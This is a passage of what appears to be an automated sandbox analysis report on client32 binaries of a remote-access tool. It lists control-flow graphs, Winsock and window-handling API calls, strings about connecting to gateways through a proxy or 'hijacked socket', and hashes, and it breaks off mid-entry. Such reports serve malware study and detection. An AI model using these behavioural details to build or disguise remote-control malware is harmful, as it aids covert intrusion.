                                                                                                control_flow_graph 2200 69cea980-69cea9e7 call 69ce5840 2203 69ceaa9c 2200->2203 2204 69cea9ed-69cea9f0 2200->2204 2205 69ceaaa2-69ceaaae 2203->2205 2204->2203 2206 69cea9f6-69cea9fb 2204->2206 2207 69ceaac6-69ceaacd 2205->2207 2208 69ceaab0-69ceaac5 call 69d028e1 2205->2208 2206->2203 2209 69ceaa01-69ceaa06 2206->2209 2212 69ceaacf-69ceaad7 2207->2212 2213 69ceab48-69ceab58 socket 2207->2213 2209->2203 2211 69ceaa0c-69ceaa21 EnterCriticalSection 2209->2211 2217 69ceaa89-69ceaa9a LeaveCriticalSection 2211->2217 2218 69ceaa23-69ceaa2b 2211->2218 2212->2213 2219 69ceaad9-69ceaadc 2212->2219 2214 69ceab5a-69ceab6f WSAGetLastError call 69d028e1 2213->2214 2215 69ceab70-69ceabc9 #21 * 2 call 69ce5e90 2213->2215 2229 69ceabcb-69ceabe3 #21 2215->2229 2230 69ceabe8-69ceac1f bind 2215->2230 2217->2205 2222 69ceaa30-69ceaa39 2218->2222 2219->2213 2223 69ceaade-69ceab05 call 69cea5c0 2219->2223 2226 69ceaa3b-69ceaa3f 2222->2226 2227 69ceaa49-69ceaa51 2222->2227 2237 69cead4a-69cead69 EnterCriticalSection 2223->2237 2238 69ceab0b-69ceab2f WSAGetLastError call 69ce30a0 2223->2238 2226->2227 2231 69ceaa41-69ceaa47 2226->2231 2227->2222 2233 69ceaa53-69ceaa5e LeaveCriticalSection 2227->2233 2229->2230 2234 69ceac41-69ceac49 2230->2234 2235 69ceac21-69ceac40 WSAGetLastError closesocket call 69d028e1 2230->2235 2231->2227 2236 69ceaa60-69ceaa88 LeaveCriticalSection call 69d028e1 2231->2236 2233->2205 2244 69ceac4b-69ceac57 2234->2244 2245 69ceac59-69ceac64 2234->2245 2239 69cead6f-69cead7d 2237->2239 2240 69ceae50-69ceae80 LeaveCriticalSection GetTickCount InterlockedExchange 2237->2240 2246 69ceae82-69ceae92 call 69d028e1 2238->2246 2256 69ceab35-69ceab47 call 69d028e1 2238->2256 2247 69cead80-69cead86 2239->2247 2240->2246 2251 69ceac65-69ceac83 htons WSASetBlockingHook call 69ce7610 2244->2251 2245->2251 2254 69cead88-69cead90 2247->2254 2255 69cead97-69ceae0f InitializeCriticalSection call 69ce8fb0 call 69d00ef0 2247->2255 2257 69ceac88-69ceac8d 2251->2257 2254->2247 2259 69cead92 2254->2259 2275 69ceae18-69ceae4b getsockname 2255->2275 2276 69ceae11 2255->2276 2262 69ceac8f-69ceacc5 WSAGetLastError WSAUnhookBlockingHook closesocket call 69ce30a0 call 69d028e1 2257->2262 2263 69ceacc6-69ceaccd 2257->2263 2259->2240 2267 69ceaccf-69ceacd6 2263->2267 2268 69cead45 WSAUnhookBlockingHook 2263->2268 2267->2268 2271 69ceacd8-69ceacfb call 69cea5c0 2267->2271 2268->2237 2271->2268 2279 69ceacfd-69cead2c WSAGetLastError WSAUnhookBlockingHook closesocket call 69ce30a0 2271->2279 2275->2240 2276->2275 2279->2246 2282 69cead32-69cead44 call 69d028e1 2279->2282
                                                                                                APIs
                                                                                                  • Part of subcall function 69CE5840: inet_ntoa.WSOCK32(69D2B8DA), ref: 69CE5852
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,?,00000000,00000000), ref: 69CEAA11
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898), ref: 69CEAA58
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898), ref: 69CEAA68
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898), ref: 69CEAA94
                                                                                                • WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 69CEAB0B
                                                                                                • socket.WSOCK32(00000002,00000001,00000000), ref: 69CEAB4E
                                                                                                • WSAGetLastError.WSOCK32(?,00000000,00000000), ref: 69CEAB5A
                                                                                                • #21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,?,00000000,00000000), ref: 69CEAB8E
                                                                                                • #21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,?,00000000,00000000), ref: 69CEABB1
                                                                                                • #21.WSOCK32(00000000,00000006,00000001,?,00000004,00001001,?,00000004,?,00000000,00000000), ref: 69CEABE3
                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 69CEAC18
                                                                                                • WSAGetLastError.WSOCK32(00001001,?,00000004,?,00000000,00000000), ref: 69CEAC21
                                                                                                • closesocket.WSOCK32(00000000), ref: 69CEAC29
                                                                                                • htons.WSOCK32(00000000), ref: 69CEAC65
                                                                                                • WSASetBlockingHook.WSOCK32(69CE63A0), ref: 69CEAC76
                                                                                                • WSAGetLastError.WSOCK32(?,00001001,?,00000004,?,00000000,00000000), ref: 69CEAC8F
                                                                                                • WSAUnhookBlockingHook.WSOCK32 ref: 69CEAC96
                                                                                                • closesocket.WSOCK32(00000000), ref: 69CEAC9C
                                                                                                • WSAGetLastError.WSOCK32(?,?,?,?,?,00001001,?,00000004,?,00000000,00000000), ref: 69CEACFD
                                                                                                • WSAUnhookBlockingHook.WSOCK32 ref: 69CEAD04
                                                                                                • closesocket.WSOCK32(00000000), ref: 69CEAD0A
                                                                                                • WSAUnhookBlockingHook.WSOCK32 ref: 69CEAD45
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,?,00001001,?,00000004,?,00000000,00000000), ref: 69CEAD4F
                                                                                                • InitializeCriticalSection.KERNEL32(-69D2CB4A,?,00001001,?,00000004,?,00000000,00000000), ref: 69CEADE6
                                                                                                  • Part of subcall function 69CE8FB0: _memset.LIBCMT ref: 69CE8FE4
                                                                                                  • Part of subcall function 69CE8FB0: getsockname.WSOCK32(?,?,00000010), ref: 69CE9005
                                                                                                • getsockname.WSOCK32(00000000,?,?), ref: 69CEAE4B
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,00001001,?,00000004,?,00000000,00000000), ref: 69CEAE60
                                                                                                • GetTickCount.KERNEL32(?,00001001,?,00000004,?,00000000,00000000), ref: 69CEAE6C
                                                                                                • InterlockedExchange.KERNEL32(?,00000000,?,00001001,?,00000004,?,00000000,00000000), ref: 69CEAE7A
                                                                                                Strings
                                                                                                • Connect error to %s using hijacked socket, error %d, xrefs: 69CEAB17
                                                                                                • Cannot connect to gateway %s via web proxy, error %d, xrefs: 69CEAD14
                                                                                                • *TcpNoDelay, xrefs: 69CEABB8
                                                                                                • Cannot connect to gateway %s, error %d, xrefs: 69CEACA6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTick_memsetbindhtonsinet_ntoasocket
                                                                                                • String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
                                                                                                • API String ID: 692187944-2561115898
                                                                                                • Opcode ID: 68569787c06ed6f39036a6055574ca85d8847a1d5457bb618e894b12ce2e2656
                                                                                                • Instruction ID: 803e11d087f955adb808fbeb7dbd159d4c6163bc166a56918d40aef609b92c16
                                                                                                • Opcode Fuzzy Hash: 68569787c06ed6f39036a6055574ca85d8847a1d5457bb618e894b12ce2e2656
                                                                                                • Instruction Fuzzy Hash: 08E19275A002199FEB14DF54D951B9DB3B5FF89314F0081BAEA0EA7280EB709E44CFA1
                                                                                                Function 11139ED0 Relevance: 54.7, APIs: 20, Strings: 11, Instructions: 474windowthreadCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2285 11139ed0-11139f05 2286 11139f12-11139f19 2285->2286 2287 11139f07-11139f0d GetCurrentThreadId 2285->2287 2288 11139f20-11139f3c call 11134830 call 11134310 2286->2288 2289 11139f1b call 11029950 2286->2289 2287->2286 2295 11139f42-11139f48 2288->2295 2296 1113a01b-1113a022 2288->2296 2289->2288 2299 1113a59a-1113a5b5 call 11162bb7 2295->2299 2300 11139f4e-11139faf call 11139a70 IsWindow IsWindowVisible call 11147060 call 1105e820 IsWindowVisible 2295->2300 2297 1113a0da-1113a0f0 2296->2297 2298 1113a028-1113a02f 2296->2298 2309 1113a0f6-1113a0fd 2297->2309 2310 1113a22f 2297->2310 2298->2297 2301 1113a035-1113a03c 2298->2301 2331 1113a011 2300->2331 2332 11139fb1-11139fb7 2300->2332 2301->2297 2304 1113a042-1113a051 FindWindowA 2301->2304 2304->2297 2308 1113a057-1113a05c IsWindowVisible 2304->2308 2308->2297 2313 1113a05e-1113a065 2308->2313 2314 1113a0ff-1113a109 2309->2314 2315 1113a10e-1113a12e call 1105e820 2309->2315 2316 1113a231-1113a242 2310->2316 2317 1113a275-1113a280 2310->2317 2313->2297 2319 1113a067-1113a08c call 11139a70 IsWindowVisible 2313->2319 2314->2317 2315->2317 2337 1113a134-1113a163 2315->2337 2321 1113a244-1113a254 2316->2321 2322 1113a25a-1113a26f 2316->2322 2323 1113a282-1113a2a2 call 1105e820 2317->2323 2324 1113a2b6-1113a2bc 2317->2324 2319->2297 2344 1113a08e-1113a09d IsIconic 2319->2344 2321->2322 2322->2317 2340 1113a2b0 2323->2340 2341 1113a2a4-1113a2ae call 1102d750 2323->2341 2326 1113a2be-1113a2ca call 11139a70 2324->2326 2327 1113a2cd-1113a2d5 2324->2327 2326->2327 2335 1113a2e7 2327->2335 2336 1113a2d7-1113a2e2 call 1106c340 2327->2336 2331->2296 2332->2331 2342 11139fb9-11139fd0 call 11147060 GetForegroundWindow 2332->2342 2346 1113a2e7 call 1112ddd0 2335->2346 2336->2335 2355 1113a165-1113a179 call 11081d30 2337->2355 2356 1113a17e-1113a191 call 11143e00 2337->2356 2340->2324 2341->2324 2362 11139fd2-11139ffc EnableWindow call 11132120 * 2 EnableWindow 2342->2362 2363 11139ffe-1113a000 2342->2363 2344->2297 2349 1113a09f-1113a0ba GetForegroundWindow call 11132120 * 2 2344->2349 2351 1113a2ec-1113a2f2 2346->2351 2393 1113a0cb-1113a0d4 EnableWindow 2349->2393 2394 1113a0bc-1113a0c2 2349->2394 2357 1113a2f4-1113a2fa call 11132a10 2351->2357 2358 1113a2fd-1113a306 2351->2358 2355->2356 2376 1113a17b 2355->2376 2377 1113a193-1113a1a4 GetLastError call 11147060 2356->2377 2378 1113a1ae-1113a1b5 2356->2378 2357->2358 2360 1113a314 call 111326b0 2358->2360 2361 1113a308-1113a30b 2358->2361 2369 1113a319-1113a31f 2360->2369 2361->2369 2370 1113a30d-1113a312 call 11132780 2361->2370 2362->2363 2363->2331 2373 1113a002-1113a008 2363->2373 2380 1113a325-1113a32b 2369->2380 2381 1113a429-1113a434 call 11139600 2369->2381 2370->2369 2373->2331 2383 1113a00a-1113a00b SetForegroundWindow 2373->2383 2376->2356 2377->2378 2387 1113a1b7-1113a1d2 2378->2387 2388 1113a228 2378->2388 2389 1113a331-1113a339 2380->2389 2390 1113a3db-1113a3e3 2380->2390 2401 1113a436-1113a448 call 110642e0 2381->2401 2402 1113a455-1113a45b 2381->2402 2383->2331 2404 1113a1d5-1113a1e1 2387->2404 2388->2310 2389->2381 2398 1113a33f-1113a345 2389->2398 2390->2381 2396 1113a3e5-1113a423 call 1103f920 call 1103f960 call 1103f980 call 1103f940 call 11110000 2390->2396 2393->2297 2394->2393 2395 1113a0c4-1113a0c5 SetForegroundWindow 2394->2395 2395->2393 2396->2381 2398->2381 2405 1113a34b-1113a362 call 111101b0 2398->2405 2401->2402 2420 1113a44a-1113a450 call 11142d90 2401->2420 2408 1113a461-1113a468 2402->2408 2409 1113a58a-1113a592 2402->2409 2410 1113a1e3-1113a1f7 call 11081d30 2404->2410 2411 1113a1fc-1113a209 call 11143e00 2404->2411 2424 1113a384 2405->2424 2425 1113a364-1113a382 call 11057eb0 2405->2425 2408->2409 2416 1113a46e-1113a487 call 1105e820 2408->2416 2409->2299 2410->2411 2432 1113a1f9 2410->2432 2411->2388 2427 1113a20b-1113a226 GetLastError call 11147060 2411->2427 2416->2409 2437 1113a48d-1113a4a0 2416->2437 2420->2402 2428 1113a386-1113a3d2 call 1110fff0 call 1104d790 call 1104ecd0 call 1104ed40 call 1104d7d0 2424->2428 2425->2428 2427->2317 2428->2381 2465 1113a3d4-1113a3d9 call 110ec320 2428->2465 2432->2411 2446 1113a4a2-1113a4a8 2437->2446 2447 1113a4cd-1113a4d3 2437->2447 2448 1113a4d9-1113a4e5 GetTickCount 2446->2448 2451 1113a4aa-1113a4c8 call 11147060 GetTickCount 2446->2451 2447->2409 2447->2448 2448->2409 2452 1113a4eb-1113a52b call 11143a50 call 11147af0 call 11143a50 call 110261a0 2448->2452 2451->2409 2471 1113a530-1113a535 2452->2471 2465->2381 2471->2471 2472 1113a537-1113a53d 2471->2472 2473 1113a540-1113a545 2472->2473 2473->2473 2474 1113a547-1113a571 call 1112d6e0 2473->2474 2477 1113a573-1113a574 FreeLibrary 2474->2477 2478 1113a57a-1113a587 call 11162777 2474->2478 2477->2478 2478->2409
                                                                                                APIs
                                                                                                • GetCurrentThreadId.KERNEL32(986DAFD2), ref: 11139F07
                                                                                                • IsWindow.USER32(000103BC), ref: 11139F65
                                                                                                • IsWindowVisible.USER32(000103BC), ref: 11139F73
                                                                                                • IsWindowVisible.USER32(000103BC), ref: 11139FAB
                                                                                                • GetForegroundWindow.USER32 ref: 11139FC6
                                                                                                • EnableWindow.USER32(000103BC,00000000), ref: 11139FE0
                                                                                                • EnableWindow.USER32(000103BC,00000001), ref: 11139FFC
                                                                                                • SetForegroundWindow.USER32(00000000), ref: 1113A00B
                                                                                                • FindWindowA.USER32 ref: 1113A049
                                                                                                • IsWindowVisible.USER32(00000000), ref: 1113A058
                                                                                                • IsWindowVisible.USER32(000103BC), ref: 1113A088
                                                                                                • IsIconic.USER32(000103BC), ref: 1113A095
                                                                                                • GetForegroundWindow.USER32 ref: 1113A09F
                                                                                                  • Part of subcall function 11132120: ShowWindow.USER32(000103BC,00000000), ref: 11132144
                                                                                                  • Part of subcall function 11132120: ShowWindow.USER32(000103BC,11139EA2), ref: 11132156
                                                                                                • SetForegroundWindow.USER32(00000000), ref: 1113A0C5
                                                                                                • EnableWindow.USER32(000103BC,00000001), ref: 1113A0D4
                                                                                                • GetLastError.KERNEL32 ref: 1113A193
                                                                                                • GetLastError.KERNEL32 ref: 1113A20B
                                                                                                • GetTickCount.KERNEL32 ref: 1113A4B8
                                                                                                • GetTickCount.KERNEL32 ref: 1113A4D9
                                                                                                  • Part of subcall function 110261A0: LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 110261A8
                                                                                                • FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 1113A574
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
                                                                                                • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
                                                                                                • API String ID: 2511061093-2542869446
                                                                                                • Opcode ID: 11f57b09c411c6798b09f472ff6fcec20de9d11e43146a182cae43b50b987b2a
                                                                                                • Instruction ID: 9ececd2581658abecd2b9d282a3ee437682ea2591524154b6e9732358788741a
                                                                                                • Opcode Fuzzy Hash: 11f57b09c411c6798b09f472ff6fcec20de9d11e43146a182cae43b50b987b2a
                                                                                                • Instruction Fuzzy Hash: FC023675E11226DFE716DFA4DD94BAAFB65BBC131EF140138E4219728CEB30A844CB91
                                                                                                Function 11134830 Relevance: 51.0, APIs: 16, Strings: 13, Instructions: 278libraryloadertimeCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2481 11134830-1113486c 2482 11134872-11134894 call 1105e820 2481->2482 2483 11134b94-11134baf call 11162bb7 2481->2483 2482->2483 2488 1113489a-111348ae GetLocalTime 2482->2488 2489 111348d1-11134953 LoadLibraryA call 11009940 call 110161e0 GetCurrentProcess 2488->2489 2490 111348b0-111348cc call 11147060 2488->2490 2497 11134955-1113496b GetProcAddress 2489->2497 2498 1113496d-11134974 GetProcessHandleCount 2489->2498 2490->2489 2497->2498 2500 11134976-11134978 SetLastError 2497->2500 2499 1113497e-11134986 2498->2499 2501 111349a2-111349ae 2499->2501 2502 11134988-111349a0 GetProcAddress 2499->2502 2500->2499 2505 111349b0-111349c8 GetProcAddress 2501->2505 2506 111349ca-111349d5 2501->2506 2502->2501 2503 111349d7-111349e2 SetLastError 2502->2503 2503->2505 2505->2506 2507 111349e4-111349ec SetLastError 2505->2507 2508 111349ef-111349ff GetProcAddress 2506->2508 2507->2508 2510 11134a01-11134a0d K32GetProcessMemoryInfo 2508->2510 2511 11134a0f-11134a11 SetLastError 2508->2511 2512 11134a17-11134a25 2510->2512 2511->2512 2513 11134a33-11134a3e 2512->2513 2514 11134a27-11134a2f 2512->2514 2515 11134a40-11134a48 2513->2515 2516 11134a4c-11134a57 2513->2516 2514->2513 2515->2516 2517 11134a65-11134a6f 2516->2517 2518 11134a59-11134a61 2516->2518 2519 11134a71-11134a78 2517->2519 2520 11134a7a-11134a7d 2517->2520 2518->2517 2522 11134a7f-11134a8d call 11147060 2519->2522 2521 11134a90-11134aa2 2520->2521 2520->2522 2526 11134b6a-11134b78 2521->2526 2527 11134aa8-11134aba call 110642e0 2521->2527 2522->2521 2529 11134b7a-11134b7b FreeLibrary 2526->2529 2530 11134b7d-11134b85 2526->2530 2527->2526 2534 11134ac0-11134ae1 call 1105e820 2527->2534 2529->2530 2532 11134b87-11134b88 FreeLibrary 2530->2532 2533 11134b8a-11134b8f 2530->2533 2532->2533 2533->2483 2535 11134b91-11134b92 FreeLibrary 2533->2535 2538 11134ae3-11134ae9 2534->2538 2539 11134aef-11134b0b call 1105e820 2534->2539 2535->2483 2538->2539 2540 11134aeb 2538->2540 2543 11134b16-11134b32 call 1105e820 2539->2543 2544 11134b0d-11134b10 2539->2544 2540->2539 2548 11134b34-11134b37 2543->2548 2549 11134b3d-11134b59 call 1105e820 2543->2549 2544->2543 2545 11134b12 2544->2545 2545->2543 2548->2549 2550 11134b39 2548->2550 2553 11134b60-11134b63 2549->2553 2554 11134b5b-11134b5e 2549->2554 2550->2549 2553->2526 2555 11134b65 call 11027de0 2553->2555 2554->2553 2554->2555 2555->2526
                                                                                                APIs
                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                • GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,986DAFD2), ref: 1113489E
                                                                                                • LoadLibraryA.KERNEL32(psapi.dll), ref: 111348F6
                                                                                                • GetCurrentProcess.KERNEL32 ref: 11134937
                                                                                                • GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11134961
                                                                                                • GetProcessHandleCount.KERNEL32(00000000,?), ref: 11134972
                                                                                                • SetLastError.KERNEL32(00000078), ref: 11134978
                                                                                                • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11134994
                                                                                                • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 111349BC
                                                                                                • SetLastError.KERNEL32(00000078), ref: 111349D9
                                                                                                • SetLastError.KERNEL32(00000078), ref: 111349E6
                                                                                                • GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 111349F8
                                                                                                • K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11134A0B
                                                                                                • SetLastError.KERNEL32(00000078), ref: 11134A11
                                                                                                • FreeLibrary.KERNEL32(?), ref: 11134B7B
                                                                                                • FreeLibrary.KERNEL32(?), ref: 11134B88
                                                                                                • FreeLibrary.KERNEL32(?), ref: 11134B92
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
                                                                                                • String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
                                                                                                • API String ID: 263027137-1001504656
                                                                                                • Opcode ID: e9bc53f18f3aff5df15c67e08978246e2bd3215a060d2d5924f045e3fecf3fd3
                                                                                                • Instruction ID: db8711c19b503e7e72fae74a2cc3466c9a493194fb08fa6cc11ddefe45185306
                                                                                                • Opcode Fuzzy Hash: e9bc53f18f3aff5df15c67e08978246e2bd3215a060d2d5924f045e3fecf3fd3
                                                                                                • Instruction Fuzzy Hash: 27B1AE78E402699FDB10CFE9CD80BADFBB5EB88319F104429E419E7648DB749884CB55
                                                                                                Function 69CE91F0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 97sleepnetworkCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • #16.WSOCK32(00000000,009686C7,69CF3361,00000000,00000000,69CF3361,00000007), ref: 69CE924C
                                                                                                • WSAGetLastError.WSOCK32(00000000,009686C7,69CF3361,00000000,00000000,69CF3361,00000007), ref: 69CE925B
                                                                                                • GetTickCount.KERNEL32(00000000,009686C7,69CF3361,00000000,00000000,69CF3361,00000007), ref: 69CE9274
                                                                                                • Sleep.KERNEL32(00000001,00000000,009686C7,69CF3361,00000000,00000000,69CF3361,00000007), ref: 69CE92A8
                                                                                                • GetTickCount.KERNEL32(00000000,009686C7,69CF3361,00000000,00000000,69CF3361,00000007), ref: 69CE92B0
                                                                                                • Sleep.KERNEL32(00000014), ref: 69CE92BC
                                                                                                Strings
                                                                                                • ReadSocket - Error %d reading response, xrefs: 69CE92F7
                                                                                                • *RecvTimeout, xrefs: 69CE927B
                                                                                                • ReadSocket - Would block, xrefs: 69CE928A
                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 69CE9226
                                                                                                • ReadSocket - Connection has been closed by peer, xrefs: 69CE92E0
                                                                                                • hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 69CE922B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountSleepTick$ErrorLast
                                                                                                • String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
                                                                                                • API String ID: 2495545493-2497412063
                                                                                                • Opcode ID: ce5daac6832c95e81c1c348d950f69317a1d24dd2dee95d0b714e7f1acc7e815
                                                                                                • Instruction ID: 7dc99c5dc945288d72784c8a9cf68eb99c2794a3ef0da052ebe877b52356296b
                                                                                                • Opcode Fuzzy Hash: ce5daac6832c95e81c1c348d950f69317a1d24dd2dee95d0b714e7f1acc7e815
                                                                                                • Instruction Fuzzy Hash: C731E379E00208AFEB00DFB8EA85B9E73F4EB45314F5084A9EA0AD7541F731AA448791
                                                                                                Function 69CF3130 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 178timethreadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetSystemTime.KERNEL32(?,?,?,962D354D,986B9CC5,962D34B3,FFFFFFFF,00000000), ref: 69CF31E2
                                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,69D1ECB0), ref: 69CF31EC
                                                                                                • GetSystemTime.KERNEL32(?,986B9CC5,962D34B3,FFFFFFFF,00000000), ref: 69CF322A
                                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,69D1ECB0), ref: 69CF3234
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,?,962D354D), ref: 69CF32BE
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 69CF32D3
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 69CF334D
                                                                                                  • Part of subcall function 69CFBA20: __strdup.LIBCMT ref: 69CFBA3A
                                                                                                  • Part of subcall function 69CFBB00: _free.LIBCMT ref: 69CFBB2D
                                                                                                Strings
                                                                                                Memory Dump Source
